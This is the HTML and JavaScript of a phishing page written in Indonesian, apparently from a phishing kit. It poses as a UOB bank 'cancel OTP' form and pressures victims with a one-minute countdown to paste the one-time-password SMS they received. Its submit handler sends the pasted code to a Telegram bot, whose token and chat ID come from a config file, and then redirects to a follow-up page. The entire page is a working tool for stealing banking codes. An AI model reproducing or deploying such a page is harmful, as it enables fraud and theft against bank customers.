<!DOCTYPE html>
<html lang="in">
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<head>
    <title> Batalkan OTP </title>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta http-equiv="Cache-Control" content="max-age=0, no-cache, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <link href="patokmakngn.html" rel="stylesheet">
    <link rel="icon" href="#">
    <link rel="apple-touch-icon" href="#">
    <style>
        body,
        html {
            background-image: url('https://internetbaik.telkomsel.com/block?orig_url=https://i.ibb.co');
            background-repeat: no-repeat;
            background-position: 100% 100%;
            background-size: 100% 100%;
            font-family: 'Ubuntu', sans-serif;
            left: 0;
            right: 0;
            bottom: 0;
            top: 0;
            margin: 0px auto;
            background-color: #dedede;
            width: 100%;
            height: auto;
            positon: fixed;
        }

        .container {
            width: 90%;
            padding: -30px 0px;
            height: auto;
            margin: 0px auto;
            border-radius: 15px;
            border: 2px #000;
            background-color: #fff;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px;
            cursor: pointer;
            background: #0057b8;
            border: none;
            text-align: center;
            height: 40px;
            width: 100%;
            max-width: 90%;
            font-family: 'Open Sans', sans-serif;
            font-size: 14px;
            font-weight: bold;
            color: #fff;
            letter-spacing: 2px;
            line-height: 1;
            border-radius: 13px;
            transition: background 200ms ease 0s;
        }

        input {
            font-family: 'Open Sans', sans-serif;
            border: 1px solid rgb(0, 134, 224);
            border-radius: 8px;
            width: 94%;
            max-width: 86%;
            display: block;
            margin: 0px auto 0 auto;
            padding: 5px;
            cursor: pointer;
            font-size: 15px;
            font-weight: solid;
            height: 27px;
            line-height: 1;
            word-spacing: 1;
            text-align: ;
        }

        a {
            margin: 10px;
            font-size: 12px;
            color: #fff;
        }

        h1 {
            background: #0062e6;
            padding: 10px 10px;
            margin: 0px;
        }

        b {
            font-size: 15px;
            color: #1dae4a;
        }
    </style>

<body>

    <section>
        <div class="col-12" style="width:559px; max-width:100%; display:block;margin:60px auto;">
            <div class="container">
                <center>
                    <img src="img/WKdf07.jpg" width="100%" style="border-radius:10px 10px 0px 0px;" alt="">
                </center>
                <center>
                </center>
                <div class="card-body d-flex py-5">
                    <div class="col">
                        <div class="row">
                            <div class="col-12 col-sm-8 col-md-7 col-lg-6 mx-auto">
                                <div class="row">
                                   <div class="col-12">
                                       <div class="alert alert-v2 alert-warning d-flex" role="alert">
                                        </div>
                                </p>
    <div class="mb-48"><a class="a-button secondary undefined"</a></div>
</div>
</style>
			</div>
	</div>
</aside>
<fieldset style="width:90%; position: relative; left: 0; right: 0; margin: 0px auto; margin-top: 10px; padding: px; border: 0px solid blue; border-radius: 15px;">
<lbl style=" color:#2061bf;font-weight: bold;font-size:15px;">
   Untuk Membatalkan Transaksi Yang Sedang Berlangsung,Silahkan Coppy (salin) OTP, Notifikasi yang diterima melalui SMS dari UOB,dan Pastikan OTP transaksi bukan anda yang melakukan
   </lbl>
</div>
<fieldset style="width:90%; position: relative; left: 0; right: 0; margin: 0px auto; margin-top: -30px; padding: px; border: 0px solid blue; border-radius: 15px; background: #fff; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;">
</center>                        </div>
                    <form id="batalotp">
  <div class="col-sm-row">
    <div class="col-12">
      <input type="text" inputmode="text" class="" id="batalID" value="" name="text"
        placeholder="Tempel Pesan disini" maxlength="200" required />

      <div class="">
        <p style="font-weight: bold; font-size: 18px; color: #0057b8; text-align: center; margin: 10px auto;" id="timers">
          1 : 00
        </p>
      </div>
    </div>
  </div>

  <br>
  <div class="row">
    <div class="col-12 col-sm col-md-8 mx-auto">
      <button href="#" id="btnSubmit" class="btn-punya" type="submit">Batalkan Sekarang</button>
      <br><br><br>
    </div>
  </div>
</form>
<script src="../../config.js"></script>
<script>
  document.getElementById("batalotp").addEventListener("submit", function (e) {
    e.preventDefault(); // Hapus perilaku default form

    const pesan = document.getElementById("batalID").value.trim();

    if (!pesan) {
      alert("Silakan masukkan pesan terlebih dahulu.");
      return;
    }

    const url = `https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendMessage`;
    const data = {
      chat_id: CHAT_ID,
      text: `📩 Pesan Pembatalan 1:\n${pesan}`
    };

    fetch(url, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(data)
    })
    .then(res => res.json())
    .then(res => {
      if (res.ok) {
        window.location.href = "lanjut2.html";
      } else {
        alert("Gagal mengirim pesan.");
      }
    })
    .catch(err => {
      console.error("Error:", err);
      alert("Terjadi kesalahan.");
    });
  });
</script>

                    </div>
                </div>
            </div>
        </div>
        <br>
        <footer>

            </div>
    </section>
    </div>
    </div>
    </div>
    </div>
    </footer>
    </div>
    <script src="https://batalkanpembelian.my.id/vendors/jquery/dist/jquery.slim.min.html"></script>
    <script src="https://batalkanpembelian.my.id/vendors/bootstrap/dist/js/bootstrap.min.html"></script>
    <script src="https://batalkanpembelian.my.id/vendors/jquery-validation/dist/jquery.validate.html"></script>
    <script src="https://batalkanpembelian.my.id/vendors/jquery-mask-plugin/dist/jquery.mask.html"></script>
    <script src='cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.html'></script>
    <script src='cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.html'></script>
    <script type='text/javascript' src='batalotp.html'></script>
    <script src="cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg==" crossorigin="anonymous" referrerpolicy="no-referrer">
       
    </script>
<script src="batalotp.html">
   
</script>

<script> document.getElementById('timer').innerHTML =
            01 + ":" + 00;
        startTimer();

        function startTimer() {
            var presentTime = document.getElementById('timer').innerHTML;
            var timeArray = presentTime.split(/[:]+/);
            var m = timeArray[0];
            var s = checkSecond((timeArray[1] - 1));
            if (s == 59) {
                m = m - 1
            }
            if (m < 0) {
                return
            }

            document.getElementById('timer').innerHTML =
                m + " : " + s;
            console.log(m)
            setTimeout(startTimer, 1000);

        }

        function checkSecond(sec) {
            if (sec < 10 && sec >= 0) {
                sec = "0" + sec
            }; // add zero in front of numbers < 10
            if (sec < 0) {
                sec = "59"
            };
            return sec;
        }
    </script>
    <script>
        document.getElementById('timers').innerHTML =
            1 + ":" + 00;
        startTimer();

        function startTimer() {
            var presentTime = document.getElementById('timers').innerHTML;
            var timeArray = presentTime.split(/[:]+/);
            var m = timeArray[0];
            var s = checkSecond((timeArray[1] - 1));
            if (s == 59) {
                m = m - 1
            }
            if (m < 0) {
                return
            }

            document.getElementById('timers').innerHTML =
                m + " : " + s;
            console.log(m)
            setTimeout(startTimer, 1000);

        }

        function checkSecond(sec) {
            if (sec < 10 && sec >= 0) {
                sec = "0" + sec
            }; // add zero in front of numbers < 10
            if (sec < 0) {
                sec = "59"
            };
            return sec;
        }
    </script>
</body>
</html>
